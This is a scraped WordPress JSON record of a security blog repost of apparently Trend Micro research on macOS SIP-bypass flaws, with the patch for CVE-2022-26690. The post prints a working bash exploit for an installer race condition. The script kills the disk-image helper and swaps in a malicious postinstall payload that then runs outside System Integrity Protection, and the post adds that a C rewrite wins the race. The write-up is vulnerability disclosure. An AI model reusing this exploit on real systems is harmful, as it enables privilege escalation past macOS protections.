{"id":49801,"date":"2022-12-20T00:00:00","date_gmt":"2022-12-20T00:00:00","guid":{"rendered":"urn:uuid:8bebeda3-0877-70cc-5492-ecdd109828e9"},"modified":"2022-12-20T00:00:00","modified_gmt":"2022-12-20T00:00:00","slug":"diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","title":{"rendered":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png\" class=\"ff-og-image-inserted\"><\/div>\n<p><b><span class=\"body-subhead-title\">A new bypass appears<\/span><\/b><\/p>\n<p>According to the aforementioned patch, we can see that if we can bypass the volume path check at line 81, then the <i>system_installd<\/i> service will spawn the script directly instead of resorting to the isolated XPC service.<\/p>\n<p>The question then is, how can we bypass the volume path check? Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we specified from the installer command line.<\/p>\n<p>So what happens if we eject the DMG volume immediately before the check? Testing this inquiry, we found that it would return the root volume at line 80 and bypass the check at line 81 as expected.<\/p>\n<p>Here is how the exploitation works using a bash script:<\/p>\n<p><span class=\"blockquote\">#!\/bin\/bash<\/span><\/p>\n<p>echo &#8220;[*] preparing the payload&#8230;&#8221;<br \/>MOUNT_DIR=&#8221;\/tmp\/.exploit&#8221;<br \/>PAYLOAD_DIR=&#8221;$MOUNT_DIR\/payload&#8221;<br \/>PAYLOAD_POST_PATH=&#8221;$PAYLOAD_DIR\/postinstall&#8221;<br \/>PAYLOAD_PRE_PATH=&#8221;$PAYLOAD_DIR\/preinstall&#8221;<br \/>mkdir -p &#8220;$PAYLOAD_DIR&#8221;<br \/># create postinstall script<br \/>echo &#8220;#!\/bin\/bash&#8221; &gt; &#8220;$PAYLOAD_POST_PATH&#8221;<br \/>echo $1 &gt;&gt; &#8220;$PAYLOAD_POST_PATH&#8221;<br \/>chmod +x &#8220;$PAYLOAD_POST_PATH&#8221;<br \/># create preinstall script just to make the exploit more elegant<br \/>echo &#8220;#!\/bin\/bash&#8221; &gt; &#8220;$PAYLOAD_PRE_PATH&#8221;<br \/>echo &#8220;echo &#8216;just a place holder, our payload is in the postinstall.'&#8221; &gt;&gt; &#8220;$PAYLOAD_PRE_PATH&#8221;<br \/>chmod +x &#8220;$PAYLOAD_PRE_PATH&#8221;<\/p>\n<p>echo &#8220;[*] preparing the dmg mounting&#8230;&#8221;<br \/>hdiutil create -size 50m -volname .exploit -ov disk.dmg<br \/>hdiutil attach -mountpoint $MOUNT_DIR disk.dmg<\/p>\n<p>sudo echo &#8220;[*] all the preparations are done.&#8221;<br \/>sudo installer -pkg $2 -target $MOUNT_DIR &amp;<\/p>\n<p>echo &#8220;[*] waiting for installer&#8230;&#8221;<br \/>while true ; do<br \/>&nbsp;&nbsp;&nbsp; target=`compgen -G &#8220;$MOUNT_DIR\/.PKInstallSandboxManager-SystemSoftware\/*\/OpenPath*\/Scripts\/*\/postinstall&#8221;`<br \/>&nbsp;&nbsp;&nbsp; if [ $target ]; then<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #hdiutil detach $MOUNT_DIR<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #detach is slow, kill the process will help us eject the dmg immediately, to win the race condition.<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; kill -9 `pgrep diskimages`<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # re-create the scripts path and put our payload inside.<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TARGET_DIR=&#8221;${target%&#8217;postinstall&#8217;}&#8221;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; echo &#8220;[*] re-creating target path: $TARGET_DIR&#8221;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mkdir -p &#8220;$TARGET_DIR&#8221;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mv &#8220;$PAYLOAD_DIR\/*&#8221; &#8220;$TARGET_DIR&#8221;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; echo &#8220;[*] replaced target: $target&#8221;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break<br \/>&nbsp;&nbsp;&nbsp; fi<br \/>done<br \/>echo &#8220;[*] all done. enjoy :P&#8221;<\/p>\n<p>Here\u2019s how the exploit works:<\/p>\n<ol>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Before installing a PKG file, create a malicious post-install script and then mount a DMG volume<\/li>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Use the <i>installer <\/i>command to install an Apple-signed package to the DMG volume<\/li>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Monitor the file creation of the post-install script in the DMG volume<\/li>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Once found, eject the DMG volume immediately, and then recreate the same directory on the root volume<\/li>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Move the previously prepared payload script into the directory<\/li>\n<li>&nbsp; &nbsp; &nbsp; &nbsp;Wait for the payload script to be executed in a SIP-Bypass context<\/li>\n<\/ol>\n<p>There is a small trick used in this exploit: the <i>detach <\/i>subcommand of <i>hdiutil<\/i> is too slow to win the race condition. The fastest way is to kill the <i>diskimages-helper <\/i>process directly.<\/p>\n<p>The bash exploitation should have worked, but it failed. This is because the shell script is so slow, it always loses the race condition. However, rewriting the logic in C language would cause the script to work.<\/p>\n<p><b><span class=\"body-subhead-title\">A new patch<\/span><\/b><\/p>\n<p>Apple addressed the issue with <a href=\"https:\/\/support.apple.com\/en-us\/HT213183\" target=\"_blank\" rel=\"noopener\">CVE-2022-26690<\/a>.<\/p>\n<p>Before launching the package scripts, it will check whether the <i>scripts <\/i>directory is restricted (trusted). If not, it will use the safe and isolated XPC service to launch the script.<\/p>\n<p>This logic works for three reasons:<\/p>\n<ol>\n<li>&nbsp; &nbsp; &nbsp; In a normal scenario, the <i>scripts<\/i> directory is restricted for Apple-signed packages. It is inside a restricted path, <i>\/Library\/Apple\/<\/i>. Thus, the script inside can be trusted and will be spawned directly.<\/li>\n<li>&nbsp; &nbsp; &nbsp; If installed to a mounted DMG volume, the <i>scripts <\/i>directory is not restricted, even though it was created by the API, <i>rootless_mkdir_restricted<\/i>. So, the script inside a DMG volume is untrusted and should be launched by the isolated XPC service.&nbsp; &nbsp; &nbsp; &nbsp;<\/li>\n<li>&nbsp; &nbsp; &nbsp; If the DMG volume is ejected, the <i>scripts <\/i>directory will disappear. Even if the same path is created, it will not be restricted.<\/li>\n<\/ol>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/l\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypas.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>More than two years ago, a researcher, A2nkF demonstrated the exploit chain from root privilege escalation to SIP-Bypass up to arbitrary kernel extension loading. In this blog entry, we will discuss how we discovered 3 more vulnerabilities from the old exploit chain. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":49802,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9555,9509],"class_list":["post-49801","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-20T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities\",\"datePublished\":\"2022-12-20T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"},\"wordCount\":778,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\",\"name\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"datePublished\":\"2022-12-20T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","og_locale":"en_US","og_type":"article","og_title":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-12-20T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities","datePublished":"2022-12-20T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"},"wordCount":778,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","url":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","name":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","datePublished":"2022-12-20T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49801","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=49801"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49801\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/49802"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=49801"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=49801"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=49801"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}